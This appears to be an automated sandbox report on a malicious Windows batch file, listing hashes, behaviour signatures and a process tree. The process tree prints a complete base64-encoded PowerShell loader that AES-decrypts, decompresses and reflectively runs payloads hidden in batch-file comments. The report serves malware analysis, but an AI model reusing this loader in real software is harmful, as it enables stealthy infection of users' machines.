Analysis
-
max time kernel
119s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
02/03/2025, 02:13
Static task
static1
Behavioral task
behavioral1
Sample
2b376fc26c056e80151240114b9775ca057083dc838c15f586bf2857c9affda8.bat
Resource
win7-20240903-en
4 signatures
150 seconds
General
-
Target
2b376fc26c056e80151240114b9775ca057083dc838c15f586bf2857c9affda8.bat
-
Size
64KB
-
MD5
c24ad5f86f3789fe871d0bd328838f9a
-
SHA1
fcdf8088406fa2b07e93c02058aa13398c065e02
-
SHA256
2b376fc26c056e80151240114b9775ca057083dc838c15f586bf2857c9affda8
-
SHA512
c5a4106048010617319175c0097f9cd1ea1f6198c0fac1590808cca198709adbe0619c0ba14fe55a56f0257f967d5cdeae8cb719472d24d860f6076aed11e88e
-
SSDEEP
1536:vSWGfd3nZkbmEKUgXEXzICKUnFrcACGUrv4fuipRcLS+/a+gjgYWjT:vP4YHfBXUzGV2G9CT
Score
8/10
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2740 powershell.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2740 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2740 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 2876 wrote to memory of 2288 2876 cmd.exe 31 PID 2876 wrote to memory of 2288 2876 cmd.exe 31 PID 2876 wrote to memory of 2288 2876 cmd.exe 31 PID 2288 wrote to memory of 2740 2288 cmd.exe 33 PID 2288 wrote to memory of 2740 2288 cmd.exe 33 PID 2288 wrote to memory of 2740 2288 cmd.exe 33
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\2b376fc26c056e80151240114b9775ca057083dc838c15f586bf2857c9affda8.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2876 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\2b376fc26c056e80151240114b9775ca057083dc838c15f586bf2857c9affda8.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:2288 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('JHVzZXJOYW1lID0gJGVudjpVU0VSTkFNRTskdXRub2IgPSAiQzpcVXNlcnNcJHVzZXJOYW1lXGR3bS5iYXQiO2lmIChUZXN0LVBhdGggJHV0bm9iKSB7ICAgIFdyaXRlLUhvc3QgIkJhdGNoIGZpbGUgZm91bmQ6ICR1dG5vYiIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAkZmlsZUxpbmVzID0gW1N5c3RlbS5JTy5GaWxlXTo6UmVhZEFsbExpbmVzKCR1dG5vYiwgW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOCk7ICAgIGZvcmVhY2ggKCRsaW5lIGluICRmaWxlTGluZXMpIHsgICAgICAgIGlmICgkbGluZSAtbWF0Y2ggJ146OjogPyguKykkJykgeyAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRldGVjdGVkIGluIHRoZSBiYXRjaCBmaWxlLiIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAgICAgICAgIHRyeSB7ICAgICAgICAgICAgICAgICRkZWNvZGVkQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRtYXRjaGVzWzFdLlRyaW0oKSk7ICAgICAgICAgICAgICAgICRpbmplY3Rpb25Db2RlID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VW5pY29kZS5HZXRTdHJpbmcoJGRlY29kZWRCeXRlcyk7ICAgICAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRlY29kZWQgc3VjY2Vzc2Z1bGx5LiIgLUZvcmVncm91bmRDb2xvciBHcmVlbjsgICAgICAgICAgICAgICAgV3JpdGUtSG9zdCAiRXhlY3V0aW5nIGluamVjdGlvbiBjb2RlLi4uIiAtRm9yZWdyb3VuZENvbG9yIFllbGxvdzsgICAgICAgICAgICAgICAgSW52b2tlLUV4cHJlc3Npb24gJGluamVjdGlvbkNvZGU7ICAgICAgICAgICAgICAgIGJyZWFrOyAgICAgICAgICAgIH0gY2F0Y2ggeyAgICAgICAgICAgICAgICBXcml0ZS1Ib3N0ICJFcnJvciBkdXJpbmcgZGVjb2Rpbmcgb3IgZXhlY3V0aW5nIGluamVjdGlvbiBjb2RlOiAkXyIgLUZvcmVncm91bmRDb2xvciBSZWQ7ICAgICAgICAgICAgfTsgICAgICAgIH07ICAgIH07fSBlbHNlIHsgICAgICBXcml0ZS1Ib3N0ICJTeXN0ZW0gRXJyb3I6IEJhdGNoIGZpbGUgbm90IGZvdW5kOiAkdXRub2IiIC1Gb3JlZ3JvdW5kQ29sb3IgUmVkOyAgICBleGl0O307ZnVuY3Rpb24gemhnY2woJHBhcmFtX3Zhcil7CSRhZXNfdmFyPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkFlc106OkNyZWF0ZSgpOwkkYWVzX3Zhci5Nb2RlPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkNpcGhlck1vZGVdOjpDQkM7CSRhZXNfdmFyLlBhZGRpbmc9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuUGFkZGluZ01vZGVdOjpQS0NTNzsJJGFlc192YXIuS2V5PVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ3FLWUdsT05iM3BrQUcySnhOOGR5UGRMTjNRa1lsVjNiN2RvdEJQOWpHeUE9Jyk7CSRhZXNfdmFyLklWPVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ1dCMmY1TDNMS3NUbDhHdWdDVStlb2c9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24geGp1eWwoJHBhcmFtX3Zhcil7CSR4Z3lvbD1OZXctT2JqZWN0IFN5c3RlbS5JTy5NZW1vcnlTdHJlYW0oLCRwYXJhbV92YXIpOwkkdm9rdWg9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTWVtb3J5U3RyZWFtOwkka2FveWY9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ29tcHJlc3Npb24uR1ppcFN0cmVhbSgkeGd5b2wsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsJJGthb3lmLkNvcHlUbygkdm9rdWgpOwkka2FveWYuRGlzcG9zZSgpOwkkeGd5b2wuRGlzcG9zZSgpOwkkdm9rdWguRGlzcG9zZSgpOwkkdm9rdWguVG9BcnJheSgpO31mdW5jdGlvbiBmb2h6cigkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJJHFoeWlyPVtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OignZGFvTCdbLTEuLi00XSAtam9pbiAnJykoW2J5dGVbXV0kcGFyYW1fdmFyKTsJJHVwaHlvPSRxaHlpci5FbnRyeVBvaW50OwkkdXBoeW8uSW52b2tlKCRudWxsLCAkcGFyYW0yX3Zhcik7fSRob3N0LlVJLlJhd1VJLldpbmRvd1RpdGxlID0gJHV0bm9iOyR4b3ZzYT1bU3lzdGVtLklPLkZpbGVdOjooJ3R4ZVRsbEFkYWVSJ1stMS4uLTExXSAtam9pbiAnJykoJHV0bm9iKS5TcGxpdChbRW52aXJvbm1lbnRdOjpOZXdMaW5lKTtmb3JlYWNoICgkZXN3IGluICR4b3ZzYSkgewlpZiAoJGVzdy5TdGFydHNXaXRoKCc6OiAnKSkJewkJJGhtdGtqPSRlc3cuU3Vic3RyaW5nKDMpOwkJYnJlYWs7CX19JG10aGhmPVtzdHJpbmdbXV0kaG10a2ouU3BsaXQoJ1wnKTskcGlidG89eGp1eWwgKHpoZ2NsIChbQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJG10aGhmWzBdKSkpOyRvdWNmaj14anV5bCAoemhnY2wgKFtDb252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkbXRoaGZbMV0pKSk7Zm9oenIgJHBpYnRvICRudWxsO2ZvaHpyICRvdWNmaiAoLFtzdHJpbmdbXV0gKCclKicpKTs=')) | Invoke-Expression"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2740
-
-